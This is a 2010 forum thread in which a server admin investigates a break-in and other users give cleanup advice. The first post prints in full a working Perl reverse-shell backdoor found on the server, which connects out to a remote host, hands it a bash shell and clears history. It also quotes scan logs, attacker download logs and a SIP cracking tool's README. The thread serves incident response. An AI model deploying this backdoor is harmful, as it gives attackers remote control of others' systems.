Server Hacked

Discussion in 'General' started by jcombs_31, Sep 22, 2010.

  1. jcombs_31

    jcombs_31 New Member

    Noticed some issues with services down on my box and started looking through my logs. It appears that the machine has been hacked and I'm still trying to see if it is with a particular site or how they got in. I did find a file named back.txt that was just sitting in the /tmp directory.

    Code:
    #!/usr/bin/perl
    use IO::Socket;
    $system    = '/bin/bash';
    $ARGC=@ARGV;
    print "--== Fucking Machine ==-- \n\n";
    if ($ARGC!=2) {
       print "Usage: $0 [Host] [Port] \n\n";
       die "Ex: $0 127.0.0.1 2121 \n";
    }
    use Socket;
    use FileHandle;
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
    print "[*] Spawning Shell \n";
    SOCKET->autoflush();
    open(STDIN, ">&SOCKET");
    open(STDOUT,">&SOCKET");
    open(STDERR,">&SOCKET");
    print "--== Thuraya Team ==--  \n\n";
    system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
    echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
    system($system);
    
    I also see a lot of this in the logs

    Code:
    72.249.74.26 - - [20/Sep/2010:23:50:04 -0500] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 364 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:08 -0500] "GET /admin/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:14 -0500] "GET /db/scripts/setup.php HTTP/1.1" 404 343 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 348 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /mysql/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 351 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 357 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /phpadmin/scripts/setup.php HTTP/1.1" 404 349 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 351 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 352 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 404 344 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 355 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:26 -0500] "GET /web/scripts/setup.php HTTP/1.1" 404 344 "-" "ZmEu"
    
    This seems to be a pretty common attack while searching the internet, but something seems to have clearly got access based on the file in tmp.

    Here is where I found the reference to back.txt, looks like it was grabbed from FTP:

    Code:
    --10:18:55--  ftp://lifepark:*password*@61.220.169.154/.trash/robot.txt
               => `robot.txt'
    Connecting to 61.220.169.154:21... connected.
    Logging in as lifepark ... Logged in!
    ==> SYST ... done.    ==> PWD ... done.
    ==> TYPE I ... done.  ==> CWD /.trash ... done.
    ==> PASV ... done.    ==> RETR robot.txt ... done.
    
        0K .......... ......                                        25.11 KB/s
    
    10:18:58 (25.11 KB/s) - `robot.txt' saved [17177]
    
    kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
    join: missing operand
    Try `join --help' for more information.
    sh: http://mysql.gwshack.us/back.txt: No such file or directory
    sh: http://mysql.gwshack.us/back.txt: No such file or directory
    --10:32:13--  http://mysql.gwshack.us/back.txt
               => `back.txt'
    Resolving mysql.gwshack.us... 213.251.132.191
    Connecting to mysql.gwshack.us|213.251.132.191|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 892 [text/plain]
    
        0K                                                       100%  121.53 MB/s
    
    10:32:14 (121.53 MB/s) - `back.txt' saved [892/892]
    
    This is a debian4 box that is updated along with the latest ISPconfig updates. One site is running wordpress which is also updated so I'm not sure where the vulnerability is.

    Any suggestions on which direction to move at this point to look for holes and clean things up?
     
    Last edited: Sep 22, 2010
  2. falko

    falko Super Moderator

    First of all I'd run chkrootkit and rkhunter to see if there are any rootkits on your system. Then make sure that all your web applications (Wordpress, Joomla, etc.) are up to date.
     
  3. till

    till Super Moderator

    Which user is the owner of /tmp/back.txt file?
     
  4. jcombs_31

    jcombs_31 New Member

    Found a lot of new files today in /tmp. The owner of all appears to be www-data

    Code:
     ls -la
    total 1400
    drwxrwxrwt  8 root     root       4096 Sep 22 16:55 .
    drwxr-xr-x 22 root     root       4096 Sep 21 21:08 ..
    drwxrwxrwt  2 root     root       4096 Sep 21 21:08 .ICE-unix
    drwxrwxrwt  2 root     root       4096 Sep 21 21:08 .X11-unix
    drwxr-xr-x  2 www-data www-data   4096 Sep 22 14:44 .session
    drwxr-xr-x  6 www-data www-data   4096 Mar 26 08:48 .svn
    -rwxr-xr-x  1 www-data www-data   4834 Mar 26 08:48 Changelog
    -rwxr-xr-x  1 www-data www-data   1361 Mar 26 08:48 README
    -rwxr-xr-x  1 www-data www-data    308 Mar 26 08:48 THANKS
    -rwxr-xr-x  1 www-data www-data     80 Mar 26 08:48 TODO
    -rwxr-xr-x  1 www-data www-data   2429 Sep 22 14:42 a
    -rwxr-xr-x  1 www-data www-data  36898 Sep  2 04:27 bfp
    -rwxr-xr-x  1 www-data www-data  20887 Sep  2 04:27 bfr
    drwxr-xr-x  5 www-data www-data   4096 Sep  2 04:27 bfr-1.6
    -rwxr-xr-x  1 www-data www-data   2010 Mar 26 09:18 crack
    -rwxr-xr-x  1 www-data www-data  65431 Sep  5 13:17 dictionar
    -rwxr-xr-x  1 www-data www-data     18 Sep  6 12:15 email
    srwx------  1 root     root          0 Sep 21 21:09 fail2ban.sock
    -rwxr-xr-x  1 www-data www-data  12175 Mar 26 08:48 fphelper.py
    -rwxr-xr-x  1 www-data www-data  12288 Mar 26 08:48 groupdb
    -rwxr-xr-x  1 www-data www-data  36772 Mar 26 08:48 helper.py
    -rwxr-xr-x  1 www-data www-data  36024 Mar 26 08:48 helper.pyc
    -rwxr-xr-x  1 www-data www-data   1833 Mar 26 09:18 install
    -rwxr-xr-x  1 www-data www-data    143 Mar 26 08:48 kill
    -rwxr-xr-x  1 www-data www-data    568 Mar 26 09:18 lib.sh
    -rwxr-xr-x  1 www-data www-data   4298 Mar 26 08:48 pptable.py
    -rwxr-xr-x  1 www-data www-data   4998 Mar 26 08:48 pptable.pyc
    -rwxr-xr-x  1 www-data www-data   4229 Mar 26 08:48 regen.py
    drwxr-xr-x  2 www-data www-data   4096 Mar 26 08:48 results
    -rwxr-xr-x  1 www-data www-data   1509 Mar 26 09:18 scan
    -rwxr-xr-x  1 www-data www-data 512766 Sep  6 14:17 sip.tgz
    -rwxr-xr-x  1 www-data www-data 110592 Mar 26 08:48 staticfull
    -rwxr-xr-x  1 www-data www-data 282624 Mar 26 08:48 staticheaders
    -rwxr-xr-x  1 www-data www-data    749 Mar 26 08:48 sv.xsl
    -rwxr-xr-x  1 www-data www-data  22222 Mar 26 08:48 svcrack.py
    -rwxr-xr-x  1 www-data www-data   9159 Mar 26 08:48 svlearnfp.py
    -rwxr-xr-x  1 www-data www-data  24601 Mar 26 08:48 svmap.py
    -rwxr-xr-x  1 www-data www-data  12852 Mar 26 08:48 svreport.py
    -rwxr-xr-x  1 www-data www-data  26016 Mar 26 08:48 svwar.py
    -rwxr-xr-x  1 www-data www-data   6152 Sep  2 04:27 timeout
    -rwxr-xr-x  1 www-data www-data   1619 Mar 26 08:48 timeout.c
    -rwxr-xr-x  1 www-data www-data  45056 Mar 26 08:48 totag
    
    Take a look at the readme

    Code:
    cat README
    Welcome to SIPVicious security tools.
    
    The 4 tools that you should be looking at are:
     - svmap
     - svwar
     - svcrack
     - svreport
    
    
    The tools:
    svmap - this is a sip scanner. When launched against
    ranges of ip address space, it will identify any SIP servers
    which it finds on the way. Also has the option to scan hosts
    on ranges of ports.
    
    svwar - identifies working extension lines on a PBX. A working
    extension is one that can be registered.
    Also tells you if the extension line requires authentication or not.
    
    svcrack - a password cracker making use of digest authentication.
    It is able to crack passwords on both registrar servers and proxy
    servers. Current cracking modes are either numeric ranges or
    words from dictionary files.
    
    svreport - able to manage sessions created by the rest of the tools
    and export to pdf, xml, csv and plain text.
    
    svlearnfp - allows you to generate new fingerprints by simply running
    the tool against a host. It will attempt to guess most values and allow
    you to save the information to the local fingerprint db. Then you can
    choose to upload it to the author so that it can be added to the database.
    
    For usage help make use of -h or --help switch.
    
    Also check out the wiki:
    http://code.google.com/p/sipvicious/w/list
    
    And if you're stuck you're welcome to contact the author.
    
    Sandro Gauci
    sandrogauc at gmail dot com
    
    Rkhunter isn't finding anything. System is always up-to-date, wordpress is newest version and only running on 1 site with suexec.
     
  5. juan_g

    juan_g New Member

    Fail2ban

    Was the Fail2ban intrusion prevention framework installed? It's one of the recommended steps for ISPConfig (see The Perfect Server, page 4, #16 Install fail2ban).

    On ISPConfig 3:

    Monitor -> Logfiles -> Show fail2ban-Log
     
    Last edited: Sep 23, 2010
  6. jcombs_31

    jcombs_31 New Member

    Yes, fail2ban is installed.

    Looks like this is coming from japan, or at least the server the files were downloaded from. In /var/log/apache2/error.log I see

    Code:
    --14:41:25--  http://61.115.230.118/icons/sip.tgz
               => `sip.tgz'
    Connecting to 61.115.230.118:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 512,766 (501K) [application/x-gzip]
    
        0K .......... .......... .......... .......... ..........  9%    8.68 KB/s
       50K .......... .......... .......... .......... .......... 19%    3.48 KB/s
      100K .......... .......... .......... .......... .......... 29%    7.66 KB/s
      150K .......... .......... .......... .......... .......... 39%    4.19 KB/s
      200K .......... .......... .......... .......... .......... 49%    5.63 KB/s
      250K .......... .......... .......... .......... .......... 59%    7.58 KB/s
      300K .......... .......... .......... .......... .......... 69%    7.43 KB/s
      350K .......... .......... .......... .......... .......... 79%    4.90 KB/s
      400K .......... .......... .......... .......... .......... 89%    8.46 KB/s
      450K .......... .......... .......... .......... .......... 99%   13.72 KB/s
      500K                                                       100%    1.31 MB/s
    
    14:42:52 (6.22 KB/s) - `sip.tgz' saved [512766/512766]
    
    Code:
     whois 61.115.230.118
    [ JPNIC database provides information regarding IP address and ASN. Its use   ]
    [ is restricted to network administration purposes. For further information,  ]
    [ use 'whois -h whois.nic.ad.jp help'. To only display English output,        ]
    [ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'.      ]
    
    Network Information:
    a. [Network Number]             61.115.230.0/24
    b. [Network Name]               AT-LINKNET
    g. [Organization]               Link Incorporated
    m. [Administrative Contact]     GO004JP
    n. [Technical Contact]          YI1082JP
    p. [Nameserver]                 dns1.atworks.co.jp
    p. [Nameserver]                 ns02.idc.jp
    p. [Nameserver]                 ns03.idc.jp
    [Assigned Date]                 2001/04/12
    [Return Date]
    [Last Update]                   2005/04/14 18:59:04(JST)
    
    Less Specific Info.
    ----------
    Yahoo Japan Corporation
                         [Allocation]                              61.115.224.0/20
    
    More Specific Info.
    ----------
    No match!!
    
     
  7. matty

    matty New Member

    grep through your apache logs for words like wget, curl, tar, exec, perl, and so on. They will most likely be using a script vulnerability to download, unpack, and run the files. That should show up what is being exploited. Also manually scroll through the logs at around the time you see that those files were downloaded. That may also give you some hints.
     
  8. till

    till Super Moderator

    As the files are owned by www-data and rkhunter is not showing any problems, it might be that the hackers did not got root priveliges yet. There had been a few vulnerabilities in phpmyadmin in the last months and your log output shows that they serached for phpmyadmin, so it might be that they went in trough phpmyadmin.

    You wrote above that this is a debian 4 system. I recommend that you update it to debian 5. There is a howto from falko available here at howtoforge that describes the debian 4 to 5 update procedure. before you update, remove phpmyadmin wth:

    apt-get remove --purge phpmyadmin

    and reinstall it after the update with:

    apt-get install phpmyadmin. You should also remove all these files in /tmp and then check your server in the next days if you see any anomal behaviours or higher load. You can check your server also with a portscanner from a external other system to see if any ports are opened that you dont wanted to be open.
     
  9. e100

    e100 New Member

    Get time stamp of that entry in error log.
    Then try to match the error to a request in the access log so you can see what page they exploited to make it download this sip.tgz.

    Do the same thing with the file dates in /tmp
    Match the creation times to requests in access log.


     
  10. jcombs_31

    jcombs_31 New Member

    Things have been ok since deleting all files that were downloaded. I went ahead and did an upgrage from etch to lenny today. The only concern I have is that it doesn't look like the kernel was upgraded.

    Code:
    uname -r
    2.6.18-128.1.1.el5.028stab062.3
    
    Any downside to using an older kernel? Debian version shows as lenny

    Code:
    cat /etc/debian_version
    5.0.6
    
    I'm just a little nervous about trying to upgrade the kernel on a remote system.
     
  11. e100

    e100 New Member

Share This Page